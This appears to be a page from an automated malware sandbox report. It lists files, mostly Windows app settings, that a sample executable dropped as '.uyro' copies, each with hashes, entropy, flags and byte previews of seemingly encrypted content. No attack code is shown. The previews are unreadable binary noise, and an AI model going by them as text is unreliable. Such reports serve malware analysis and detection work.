Preview:	7.....y..C.:~ y.#.......s`x.M.....I..Q:.:..4!%..=.f..p..>...."cP...........u..o..%.p.....f..}....'....j,?..Ef......8ycG{!..Lu..~........n.X..1..9>.I.](.%..P.8..E1..~....:Sj.sD..V....(`h].......r...{.."........@?p.....;...C...j.....}.k.M5...Q.~.j...<9?...t.)9W.F!....^'.SF.i...r.$n.`.$?.])......;......d.~._...b7.....O...XE.............~...F.c.P..-.i..7....X...>..:.&`..)w?..r.8i.?..rR<./...&.\|y..w..K<..y..B......Y.!.Vw[......8..7).}WE..^.F..4............."yYj...8.P..VCw..:t.:.6`5K6.Z.ehP.'..C..}....>G0.-...$.;...a...j=.....M..xw2.8e....7N1.O.]..1v.o..9RY....BL2.....V.dd..DIl.T.~+ZiO.&}M..U.S)~3..R....s'..+k.... .....U......VU...x.....J...e[;.).O.{.a......s..._..o..a.2I.....O`.3lq'...+...]3y.Pnt._.A...W..p..n..xO..A.2../. .7S.....).@U.L'e......h..]n};h..n.f............(?.,I..Al..C.%.\..c.c..e$A....<.-...T.m..C..(.^.~.hS.....,...(B*.Z...+j......2@......c...0...p.w..r...Q..,./.........f.x.5.q/a..#...5.....P.I......u<.Xw.....b.N-...X.i....

C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4430
Entropy (8bit):	7.957971230543583
Encrypted:	false
SSDEEP:	96:TZVpC1Y7XvEuX3JgrvmNjjQrQi2svq+w27IU96D7LSgnDG:TAyXsM3RNjjmrvqT2kUEfLSgDG
MD5:	D18B6E33F4B03242422CD8106F854DD8
SHA1:	F8B86AD1D485AEB03885E2EB4C5990BC01D54846
SHA-256:	2F007694297C2BD9259CE47C83DDCA6381A0937C7FDD56DC234E70242CCB5395
SHA-512:	4F8E1B7D77F0A5DEFBADD8E516D9DA97E72B2578B7FE5B130B3E90AF0E07EAFE72138F60FF6985A81CC4B9FA2C8F5E2727830440E08A94E46B5B3532BD085A6B
Malicious:	false
Reputation:	unknown
Preview:	SQLit.y..o..,OT. ..7..1...C....\|..... y../.....e.43...x#....'G....+...}.w..._0.r...r.Y}..q..gg}........./">8W..#o...]..0V.J..F......H.[O..!.R..7.......o.).{.or.EH.N.)i.....!..T..o..;.a.M&...U#..qk7.'.].'.[.A..:.:....XJ.6.....o.)...L2.>....4YL(..Uq...........M.C .{...?....X.Nv...7`........P..L..6.x.8B.m.....28.-&Q..J.f..."E.l.)...r...;;..&.3A...K.N..]\H.gz.f..)..oR]k.......s[.:.....Y..Mg.v.;hYK_..M.,..(..q...3..6.\.r6..&q..t..6...%3s.......~.n<.;.O.$D....K.....3F..^r.......a..a....T#{ew....;\....<]..6.6M.ef..q........!I.."Zr.r........$...wH....$.......eis...B!..%/.../1....(.P.....2:)%Y2<..y....YlILS!W4(..B..9h%...Ki......1iK.....o..}I.<.g{s...k.z.....e..n'...'MRY....[h......(..S.Y8b../..'l\|.......[.a.2.^n.U.[.[..'....Xd6r0.u...w}.~.(..3t.....G......N."a.b....ma...2mL-..-...mK.<T..d....3.y'BX.^...k".,.K\...F.1v/wfO...#gTl&.....C.8.?..5[.\...\|..E..e7x.s!.......q............e..)....R......f...x.......Q.L..........Kh......m.p{..#4x.f$..XH).....="

C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65870
Entropy (8bit):	7.996954284858356
Encrypted:	true
SSDEEP:	1536:+yl00V3DllEOipDxuZ/SQjMR5vYieLMuMngSVtvDlS:N9jEOCxuITvheLMT7JS
MD5:	0832B95ABB36065975C542B1872E8D81
SHA1:	8CCF08448B2B07DC62537B1B05C2FCF55057A3D4
SHA-256:	9C1C1B93FAAD13212CD172EB98C13657DD1E5F005A5F45E7FB636B455FE4D5B7
SHA-512:	83B5313309E05D8CEBB8BCD47171C4103CC27FC3D9559E803314B211B9421ECABC2E9D7854DE668FDA8A6EC787A70AFFD1716EA75B58D071A9A3F01034309472
Malicious:	true
Reputation:	unknown
Preview:	.....8~.K....c....e.S.....3).{..d...Sd...&.i2.i3Ze..F...c._yS\|@UY>&J.......C;u.)..L{g.P......t.n..g.....:.{+.....bp..,..id.....W..H\|..........]6..j...l9..Z.&4.....ZK....E......9.....6&,V.o.h.=q,{w$.......pL.:.gO%...W........b...$.GvS.\|......".B..../...h.&......CV...;G...:.....X...<.,.........;.F.h... "FS%}8.K.....}.~.e..V..j".....oQ.._.V...KX...F..2..CZ...c.-.L[.TNx....3.d2......,.-.y...H~.........E...B%+...<..Q.dkz%.w.G........T.+.~....U.u@.}.y.A."....J..-A.5N.sv......%....%..G.%.\......:....-(i..;...=.^.....F.X...........C}.._...\|\.Qyu^.B.p.b7'.......JMk..&.ZW55...I..z.V..X......0I..t".B0.]..2.....f............I&.k..8...QV.J....F...8..&..9'l...~NZ"...vh.....o..k..i8,..,4.C.H...V..w....%...\|q8w..@......'....* M......".....;&.^=.../%.T.H.J..:.sb............n..i,e..l.6O.Xlp.......X%..1.........G.g...K.} t....P.5W.K.s....@..w(_....P.i....W..MR..".....iQ....?.4...x...X.Q..oK.-@.d.ht8..,Y......V@.TY\...].Yj.J.=.r.[.k....M.."U...#.b..'.

C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976685830993885
Encrypted:	false
SSDEEP:	192:Avf/G0iILxXLvfa5R2vZnnCAHty/e9MrvOOICt+WLr+:Of/vbLxXL3a5kNCANyrhvtNr+
MD5:	651ACD9E127631FBADBC54CC305E4521
SHA1:	C3719D4141C5E996FF23F5FC144A0FA4F3ECF344
SHA-256:	E5E180562BD48F6514724513AD25364462834A25CA9F44405A617B2A53062ABF
SHA-512:	351EC5843FDD05ACB8C5F5F211C9757E5DFB5C0938520ED1D05A02D335569C3A3C02B50C40E68EF1C82845CF7DD7EB3441E080C4EAC9753F4EE7ADC183D5479C
Malicious:	false
Reputation:	unknown
Preview:	regf.6Z...B..rt8....].V5gC.H6.....NQ..m....KNh..8..3i....)....L..........T..H.M..a.../Q$.8.......]..u.Um..u....O.......-.....[@tD}..5....q.[....{....t\|.a..5.I.........\|.....!:#b......a.).r3TU(.3..P..\|.X..t....L.=.o..f..[..\|....+)....=..4g.h.4..../.vj\|...a...&.o....O.l.sS]."q..g..........N.\-.7.\|..k.....g0..es.........KY...kDqC..h..J..k}.w..'.\|.W-..xN.~..x._..CQ..R`........e....Y..]8.w....2..Q....=..xT\|.'..6).gw........&,-.].5.u...........u.....6..~,cu=.6B..RiS...M..xi...........h......%..gE.VK....r..o.@...]...^....k./-..e......i!....uJ...$...(f..d.c..4...nz..x.yi..y..aO.0.te.... .IL.t1R...$(./g..O..J...:..gUR.V.3%l....?WGU.G.6Q,.c.B..@89..% 3.).N,..<p........f.....~.Kz....V.y..."..?7.....G.<'.\|..F.z."....oKK:e*..Z.......F.?.}q.@w./.f..6...A>J.......`$..}..D.B6a..}qL...}#.RU..c..L.~+w.tuw...c.......F0.<~.........,g@c..<2'.1.Z.l...n.hb.u.........\./..<..xh...F(...n.1P........i.N....^.s.f5z"F..,....%7...W.......HB....k,.rd.(.r

C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97852739517054
Encrypted:	false
SSDEEP:	192:DM9K5TVZr/Z1B5G6PqVtqIYPcOl8MsPOI8bSN:oUBL/Z1BfwPi8MsPnl
MD5:	84E694D9533CBB6F7EFFEEDF14B6135D
SHA1:	9C044A7A6427A558E5026586D784DCD07F822DD7
SHA-256:	B3A45A321D0560F80386FE731C09EB7EF141A2E5A3CE5C333B40C3C40B911280
SHA-512:	330F6308B4DFC41B97D7ADED933F79B3E0D92F0612D6015B1729B5E72E7691FAFDA9A885695C6E2187E9231A91B388435B225F870B4A0820D5F66E7CC8B5F7D3
Malicious:	false
Reputation:	unknown
Preview:	regf..D\hq.H./..).i.a...nG....}....h..]J....CG~i.o+....I....g.19.BP.K.op..I!B.........M..)@R...ub....[.....'`..3....p.......?.L......;..E....q..q(/..4.b}.xAp4.T.pz -\.......2X<.e6...H...o........J..k...9:b.QQ.....].,....V.......U+.i.vB.......`2R."yu.T..Vq...$....,..s....D.;W.%&.<...3....F..2.9ZZ..y"jU...1R..sF...f.F.u/\.\|.?>Xd..%.EP.......fr.=....@..#/....U.mo......Tr`..$...2{1.P]p.DX.zC.9.?..j.l.6mT.....,.."..5..bA.<....T.f..T...5.Y.Q..ao...wD4.].'S(...6....c.........T=....K..^.e.S%......iLvu..t.6......J.).....Cl.K....g...5Q[.&B).s..a..x...v5.K../D.`...24...E....^.]sy.F..>.o...4h.G.Q..`..c_Q.........<..K.[LU...>\|K...@..fb.....[,.;PY]....:..5..f...b...&l..a._....IR.\|.h....^...D........{gh7..O........e[6...S-@....S.]..G.(...e...F.nt...M...uC....O%9@...J............a..s.9Qh..v..?.R.:..o....PN....-7pZ...w3.....9s....%N_.Q.".k...m..A.....k....7MK..1..#.3 b.~..wjY..D.Dg..Dfa.o.......e......C.Y~.8ItE4...S....f...X.Q*.."...!...E ..C->.{..

C:\Users\user\Local Settings\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978693953534163
Encrypted:	false
SSDEEP:	96:hHQj3ckAsB+TZSVZr2wfrsePsCf+nZfg+eYSOZ4YK9cBG4jRdVPtN9iZbEV1mqXv:hu3ckXVVZSwfruZwYPZ88G4XF9iluNTv
MD5:	3B08ACE3C19ED81FEF3D973059A5DF92
SHA1:	5FA75FA2B6AE2670AA997775E89585E3DF560939
SHA-256:	5B0B10B8F4FDEBB02AFCEF8654B766E83283E68DC65A91004F5DBC360628ED62
SHA-512:	73C36D76C8B97689E1D3FBECC73C11E25164E8E1DDCED2F2F8643FD83AB39394F9D30A8910973661118CDFFE5E3DFA361537527EE05B637C39633254B7EEC687
Malicious:	false
Reputation:	unknown
Preview:	regf.vt... . ...u...-.......t....y...>.X\.!wm..X.(pc}.<...~....dM.keb.8..5......}^.J..v...+>@.....l...O~e.@r....$f.....%..j?c...8q.......U.iW...%.;.Km......u!.Tjq.L.]..X[.A-...T.k.b...HB.%}'.Lx.>........C.J..V....Q/U.J.....AH.pQ..X.NLS ....._\hC....+.M.Cq....U8V.....^}..w..!tS......~..b..O....L..._.>i.......>.R.+4@...s..;..F...X....T.:.ZW.x(xo.........S.sh[.9....%...x._.=...X.mWP...FSq,.....p.R..%....n..Fbr.......=.E.V..._.,o.l...".u.R..4^.~D...j...=.].6..J.>....c..jz.\n....#.x..lO..]+)...:....L/.%.7.. k...;.X..@.c....P.8.....N].....v/x.4oyo..Th...U.R...o.5Fg.MY@.}.#aaM+...q........\|.h#.I.=.`....k......;.Q%Vv.RL..\|{x$...XV`m..o.......N...=k...k..lXZX..P.^e....M....n.4....?...2..W...T..W+`j...6.lm..taLGvvI........7...^.;...G.1..q.,?.../..`.........-.T...i&.........z..$.PR.,.D....7..H...t......u..g<......#].g..p.:IT.~...._f....2.....76...c_}.a}'>..M;...6]..n4..1..Z..k......C.v...p.;X..x...i.MZ..%...h/.!......N....?\>.Cn....iL......_.

C:\Users\user\Local Settings\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977260634356733
Encrypted:	false
SSDEEP:	192:BBqruX0vAsuaHn86Iy4DverZHOkIswtqRXoiC10vctVuJ7K55Md8jKze:MG4AsnGerZHLzMqR4Ict4J7K55ASUe
MD5:	11018FA25B11921B7D0E411AE357AD4E
SHA1:	40B4A9346C7D202E30199646B09CC0F2196734A0
SHA-256:	5465449E72D3B65A0240708136DC00A63BC7AF0DDCCD6D8107D134A052B50A4C
SHA-512:	EC6AD9A79B30A7A25F017A499AA7C4BEE50347B872F1C831B0AD74AEB5C0D18CAC10E432BBA9ADD41EE6F5E0E668279FB35A5D521435519D066CFFF54AD7170A
Malicious:	false
Reputation:	unknown
Preview:	regf."...R:d....v....Es.".5Q<...Mtf....>.DA..X.zo...\.... },...;..L.Z[".. .."h.e.U..S3%...^.Al.r.E.N...........&..Q...2.wx.O..&.........U_.....I."......!.......7Z...d..p'+P./X..P.D..9..}.b..c.....#..D....-..]....V.wH..l.W....s.[..M...MA....... 2..y0...=.e{D?.7.$.\|X.A..i.$...KLi8.....e.~g.`....'s..V).....H..O...v.....C.ff.LE..#n.=...).. A..<.._\.>.//.g..F..>.A...u.Ir....r..c.........+...I..%.!...`.J.$9:.......)V..\_._h...<.W^)..dA......<..O[3s.V..\|.r6..Fy.l..hfGb..q.k....f.....N...h..]...~..J...I.f..VG9..m.0.....E3.7.qY..w.L. .....S....1.e..........'O...T......-B.NeC.IQ.YV.......^.mtA.......qMten.-.....G.V....=.S}.5I..K.IL.dt.Z.ev.QCQ(r......vX..-C.@..A....^.....4.k.B.g..T..9U..b.(.Z.2.n.......+%.,N.9.].r....y[.O.......#(V..0.`..d.-~..3...X.>?h#...W9GlD9U...^....9.4..V4./I.........D#..GD.h.!T..iN...6.&IN.OX]TG.\|!.....>D<Q.aW...3;2.?..N4"eE~...u1yv..\|...p3.....!.....h.B..V.v..J.....dA.%.z4..eN.pb..<V.kV..U...+}.&8+...d.n.6..

C:\Users\user\Local Settings\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977484976257668
Encrypted:	false
SSDEEP:	192:85b2x8RadRvXAfxDTaIhmGusqACu4XNabcqGyiMaE5YXM+zo:85bURvwxDTaIhmGVOabcslaDW
MD5:	7A2338316FA73146B2ACBDA9F12ACEC6
SHA1:	90C4F9F28EE04E79C55800E4F4CD6C44BC0F50FE
SHA-256:	98B812BCA3B93E9A64B3845024BB3A1C1FD274AA52C5BC7F1D5FF8F08F02E097
SHA-512:	FF1506B05718ECD0D1EF7839F677D4401FD4EFDEF892CB6B8D63E91632B4FE2C30B05CECE651B403B6DF29DF3F913D693FB1AB497CD0754F07CB4B96C23566E7
Malicious:	false
Reputation:	unknown
Preview:	regf.k......a....".>4.{B.D.`.5..-....<..s.T...b8K..f=...)...Q.....#..4......8..y'_{.]!.....\"/.U...I}.OIMH... .f.iV.G..........s.>.'K'...R....Q.H......C..w.A.Z'........vQ.X+..N.G...}[..4tK`FC@../.f.3a...U......G/g.,...8._5...J..Md.\|\|1......uW;..p..vq.:w..gB.4..~%.M.Q....\...T....).T.......z.r..c8.Y..;.eD_...<.J.TUN.....4....f.?.a......W.._.p..B...Q.{..\L.5L\|.......Mj.V...K..... ..oX>.S...<..v.Lk.f....\|.....2...lI...ri...E..~s..Y..Q...e..m.S.8..`.i...Q...%E.b.;h.....Z.io.n.!...;. ,C...=....Y.@R.P.......@9O....k..^.eU...6wH.O.f..:`.5R......!.O.I.n..cm.....:....cq.k...(...#RZ\|HM..^...U.....n%....=..1.1.{...Dw..H.1r......"... s.(a.8..H..5}.IV.sl.....Rw09z/./.e...h....U.4.I........o}..-..en..@V..h.d..t..0..........<.d....\|A=.&'........H...J^k,.{B.&...(^.8.N.3C......J..+\.........@.`...P..x`....?.T..26..C.&.A...e...Vuz.h..(.;.....i..!.c...K.o\...W.\....f.5....F..F4V.;.... x............*.'...3...#...)L.....r^.....nJ..I...Xke@.....Q4A}zH...

C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	46932
Entropy (8bit):	7.9964402881877765
Encrypted:	true
SSDEEP:	768:DD4V4aPWeIyOTCwjI1clZJljYtjvmPELPzKUsciP7rvqEZ80IZhbXR8LlDM:omWWecVjbYtjOPELPzPsc+yettLVM
MD5:	A730529B7F6AA60011935982391E1866
SHA1:	F8FDBF4437B2193BDB0C7E2B5CF6C8280D87FF5B
SHA-256:	A485DABDB261DB49F268E56A2F036F453569504B41780C198D1EF12F86AAAF24
SHA-512:	80A3DD628793A9827F91D91B3BAAF59285368C84356C035D5D9B0607277F3D1D15EC3B40A16C78F9F2CB804ED0B2073F773866DB3808EAF9D9CB72727F03DFB6
Malicious:	true
Reputation:	unknown
Preview:	+N..0......N ..D,Y.g...U9m...c...&.0.......I..F.Zu....\z!...H4.6..W..i..L.5..Y...R...j.N=.,...7(aQ.#. ...!.m0...E/.\{..o.q+o...Nq.N.L..wB..J.Q...".y..!.....MR..BZ...DA...10.\|_..n.3]l.....l~...E?......yO...~........Np.?^.<.....,Ot.r.W.5...Y...9...f.c$.K.b..~.f....{bS!......_..Q....-....a.s...N..=Lt;........<..A.oV&.........u.F.n^..}..^...\|..... .+..x1O...l?..J.j.ihB5.i.j..q.....S.zP..L.....Z..V.,Yn.......d..~.r..1.....m..F..B.c.?.J...;.~....C@c-.e....r..}.o.Q...S..Q..!.}@U..nH....at<}(h.\|q..x.....i.(....W... ....Z...J9..~.e......*.B........V...L1...8b~..^Z}K....-.......".s.?!..~....A..S..4.W.GH........T.\|(@..h.4.%....\|W.Z.\.;..-...}3.=..m..R.........<....'..z3.E.#.H$.VS......i.OE.._MMnUy/."..G.cp/.4$.^.X..\.Zi..\eK....P.........mvO....C.y.......E...}\....F..Lq,.qL......GZ.....1..I.......X.L..:.!.....(J.i.....E.Z.{J...f4...<...-.;.z...,......{.<..~.....d.=..C..<....?..`AQ.^.....9bNy%L.zW..1Q.....?..=o.^.V....\|...W....G.....1.IQ

C:\Users\user\Local Settings\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974886709590954
Encrypted:	false
SSDEEP:	192:d0TLxPngQ0L8x8H+CRC8p5Mu+Dz019b5D6TA/HcGgyb/P7oC4zSrD:d0TdPgQZ8H+Cf+Z3078TgHcGF/P7oC4a
MD5:	CF3FC0EBB3A4300712919D69BDCE0500
SHA1:	C04BFA6387C493E38D701ECD6318935E1DE51F3A
SHA-256:	3B0B626D7E9235DAF66EE4BCCAD4082A2066DF90D2A722E362F616F32DED46D2
SHA-512:	00ADF21CFB278C65AA0BDF86EC3C94E14053521263E9D1AE3AD959EF11EC9A031707A6EAA27656025A108E35AA65775A492F02C9F2BB5AF163F87B9D5E8A174B
Malicious:	false
Reputation:	unknown
Preview:	regf..K..-...4.4r............W.(......~....lz.....:........ZZh8G..a2h.9......n8..Y{...\....U.5l.m........./..z..1!.\~D}_(Z<......M.O..O...Se.d..~.w.U.3l1.%[.Z7-...Gj]...}..5....`.M.\.`.o._..........q..\._8KR....Q...\|+.7.WH.MC{...!X.P.....mD.uPNX...p.....=Y....o.#...Hb....3...]^....r..^_D...pOA..`o...Fn......;.g.....B.{.uK..-u...b.qA6..M5e`5-...R9P...4o.%.....Z..gy.!......#..<...8X.S..>.....4..&.>7C.."..)......&..]x.r.y.F..\${.....K.=.Q.\%.3$6.(\|.p.`.2.G.....p...r8:]t.FD.....C~t.......y..>.W.](.,=S.F.o._.....Xv.........._i..`9./G~.&..rasx....}..........b!..[..6....5...b..''o.LX.J..w.y.+&a5.Ji....;.%.+}.1Kr..U9.....C&.4....:..(d...{.?tb.vv'Q..R.qn...jp..i.....a.......<......;o...WL.7..[Q+.gQ...P.n....j...n..ar.....]U.3.x.....\.....?....f.Dti!mm...{...R..]..U7.'@.U.X.n..R&.wV.q....9ai..._.y(....P.\|}..V.m...y=xM..].....\....[>.......5..~..+...7.....^.x...........>.r2T..1Y....].@K.......e(..Q..#....X...jm.... ......qKT(.".F.s...FZ..C^.`.<G......

C:\Users\user\Local Settings\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.9786489656273085
Encrypted:	false
SSDEEP:	96:JkdzX6Fs7+YGWVWK+FDMUWOldLsvy5MvbQUX6dzoarAXbzIcmzRqQfWLx6A6ca7M:Yr9SDMfSLsK5wXU8a0XoBfWLxH6cgcJ
MD5:	1B520CD4DB79A77B3401BB8611E29472
SHA1:	52E3F98B1DEBC9312D35FBEA8CAA6C66F7ACC583
SHA-256:	A357F2774BC0FED02F120AEFE3DAD9466E3A61C658DF520FD5B4FCC1D9F57EE7
SHA-512:	71A820C5342A45018540674A48DD0FDBBA5015176182F736E5B351D44919BFCE0027D8E775BE02F895574C36A98D1C74DDA7D950C1294CF8EB0E862F75C3B6D1
Malicious:	false
Reputation:	unknown
Preview:	regf....w..EV.y..60..^(^.....3J.^....@...U...)..o..h.8.....y.N>".....c.2...3B..hy.."..$..%v.n.\|....h.........:.....n...U>E.UF<.;.q..hK.bl.`.....a...D...13KM...ZYfN-.B&).w,..%..cR......O.G..X...U..OcJ...d3N....r...c.......a..?.Ty....4..........fF.$..A.Qy+....~u.A.N.M...n.H.-.....'......@.......I.cPO.p..-...>..%.P....wCu:.\..@H+k.0=6.\|o.M...ci.....y^.[?!.....?..... ...S'..+.zt.N.......M.l.?..z...,.A.....D..!....G...)..:...z.^.lI..7.S.....\....0...zn..'j.nU'...OI.\.f.50...=.......;l.p.-)..............;Pq..xX..V....v....$...E.&...N....7Fb..h....E...fM..J"'..w.w.L..}...d.].g.\(G....F&..7..ZaD(..81....pV]..z.y..x......2.".u.).j..Q.wJ.pm.).v.H.P..e{H\%.\........7.u....]...)..]..M..l.....p..?..T.s..u..H.^.....,....:...Y...P..;.@.X...C`...{Hk..'.{..V....C.....P..;..a..N.^X...$j.0B.....}...14.....u.M6/.MJC....k..o.........Hm.IO.\|..B.].l..=.SP..........5....@..?....!..cS....8b.WK6<kQ...Zg.....1i...Q^".}>/..t.@.w].&...+...t..`.....i..-.\x[..k}Q.c..

C:\Users\user\Local Settings\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980062347164076
Encrypted:	false
SSDEEP:	192:aWKuXfClhlsm1COk1CAGnp71lWfhZYe/ce0OY24bymc4OddvNAy:xKu6/1CtEPnpLctRz48
MD5:	39D12E6FE48AD3DF2789EB0EEDB70B11
SHA1:	5913236C5C1E8D6BCAE186CA867A5E50A3A6DFDD
SHA-256:	D511297E3DDC72C6ECA242B94049298751A9F4BA306F1D8BCF32DF3815BAB609
SHA-512:	77048A1445ED7785DB80EAF438A7A9CFDB0B6F0F534817483660E59C6D8E20989B5D42666088F02732EC30EB12441D2589BA3A2170A7F5644668D97A292809F1
Malicious:	false
Reputation:	unknown
Preview:	regf....9......f..c....!....`\......d...j.A\|;.u.&.{:.\|.e8,....IpqvIA.O.A>.7\.,.5.n.L...!.5..n..4j.6..8W......UV.o9..-.!......).jY..S.SJHo.2....h..b,Bq..AY...\...hY.....T+u.Nd.o5.........k.;.[L.O..Q.y.pK..%.y.3...CuF....u.........../.O..........8.5hO...?....p]....c[q...A...=.Z..2(..o.)n...-j......I.......E..4+.'i...X...4+.`K...." .....d.v(...f.&.G.(.....L6MT..."J.%z.$....7C.....)..I..1.........+..c.q..xh..#P..".tu........6^z..kDx7..e...$..u{.]e.....h..<S{T..n..+g.....H.K............;..Pg.\|(..[..'^.0{.f+..E.........cf..l..NE<....e...=w....TeL..k....%....jK0m.......4..e./............^....Q?8...4...W....Z.P...] ..b.Q.W.......3z&.D/.U...2....O.H...%....x...4.U.......$.......;..,.....T...$5..a.Y. >...m....N..X..!4;9^...6]...PO+I.P.@..#1..]..GK%d..3v..f....G.....;...)...z.l-v<d8.).,..)Dq9.\..5........d...k.(E..7hLG.......=.j..Y.....Q..^....).;~...{...d=...I./-obL@.8;.t..=.....=......yhY...@Jv.{..*.).'&N...@....@..q...)k...~.my..N.]j=..wP4<

C:\Users\user\Local Settings\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979347752238097
Encrypted:	false
SSDEEP:	192:ejzNJN0dQcJrRoe5RnkXYn0Zfzg9bgZ+oq1L/HaOcJ+Z:ey97Rnk00xg98ZGd/6p+Z
MD5:	4598039847EE36795299D3278152FFC1
SHA1:	E2DD65BE14E9C781E1980C9B1DAF4611960F45B4
SHA-256:	274DE5DDDB62ABF49F13060F5F5BC821A4CC960CA0D3529AA9D5250761244815
SHA-512:	7E6B8C55E9AB39570A40F1F2A9FD866FBD0B022A723BE0F8816A1021608319F302D96F49DC1FEECD46464FE4079769FBBF4BEAA684C0A811633E2ABBB7505E94
Malicious:	false
Reputation:	unknown
Preview:	regf...........M..D.Hqj~(`...,.........."......\1JT.E..z...Y-/N..\|....#.0$....E.2....X'mu..iB..e.\|..-[\|...U.....FkQqE(.7\|....l..+v...r..S`.2[...Y....e....e..`.....P.fS..+v+.B...k........Q5......$.X.>....`..dp../.GX.d....r.\|.Si$'l(.+..b...ab.k.O.3..Q9...Cd.....V..%...F...;R.(..m.....lS}9.9?..u.Y.N..O..8.2-I....qUz6..=.Zc..X=..f.h..TB.......6Xl..'wO.....8':..B....%\|.%../...:.....Hkj.....U(]'....'....),...D\..jX.FP._%..WuX..M.....O.h."v...s.;....KwB..GM...]EL..&${ZR:.Dh..#..`...\..q^\|[...7.=+...&.#.J..Twh9..O_&~s..{.4.61.;..h..38I,_4...I./.{..m.)......f.....F.6..JK.....C....(S.<...@.ce.,..(A....`\w..L.....z.4.Z..... .....<.,d6t].N?D]%eoQ..g..9U.s.,I..l.4T.C...~.S....B.K"..).Sx.}m.;.....{(7.,........I)..... ^....@9.8........Fv..t.F~..e.%.W..$*.i...?.....F_......B.)....Rwj......-...;....Y..[.i..........$.#T..@.q...Z\|.:. .....Q.Y`..mD./.].wv0....\..!pD.Sy2......o.....W.w..p.&G........4".......;...n......[3.......K"..I.=%]y{o......0+c..r....`.G

C:\Users\user\Local Settings\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977249006060265
Encrypted:	false
SSDEEP:	192:ZvmbwNFQQ7UV+zyPOZlESpuwnltgq43a8tx6jkMkEXbL9z7rI/:ZvGwNPA+z1nESEAlsaMmkMky1z7rI/
MD5:	95E8AA7473DEAB711621B22C1F9C3412
SHA1:	BA196EFF25DD2AF4CA20A4BFE6F42E79FCF3D084
SHA-256:	564EA1C1F26DBBBF7A81083E2510AA386FBE59DB5B912578869E56F552EA0E00
SHA-512:	468ED936011E79FF4D60F13311F16E2042250B036267170DBFA8472109322B3CA3C23B98FC158872CFD5B09F9C93978EB5B345D5A2FF13186A92A1AEAFF99FE3
Malicious:	false
Reputation:	unknown
Preview:	regf.Zhd8..a...3<q...W..r.7VN....H..v.sz.. N.i.t.Al.x....;.h.S...=..#........gW..)..)...#.l/D....8...K.QZ.U...5.2i.V.!..=..l.QF.....v2xr..6..F.....$P..`.....A....}..M9.m.iz..1K.........9.y.H-.`.M.&\|..[.]^.D....O.^.!.dp.;?$.r.?..Q..?...^}...@.u....%.E5....9....RV._X!....m.R1.:.\9(c..R...B.....I{..G..o..:...Jk..!....B.....r....<..*@....F...<L...8M...&.1..[n.L..%g`...t.U6....h.7_:O...F....x.b..^^......+J.....!.....z..kMtZZ.....P..8......_.A..]..L.@g=..M....f.o......r..).oZ.f\|......&..D. ...+6x^.M....SK .u....^....M&.M.I.0M.u...........k.Q..c(z.....A.P..j O...kGS'4...E..s..f.."2..'C.0.$.t.....GtoM.'........0....H.$......K..I>... ..)..UO.6i....A+l......K/H..T.</m..\<p.&c\|.%.?.Z..&+v.1..l.XK.P....n.W4..I&.N..e.j.K..&.8.%..x.R..T.6.O. .`xO.....R.....=N.~..........Tp6...%.e9....Jhmc..}.\|0.... 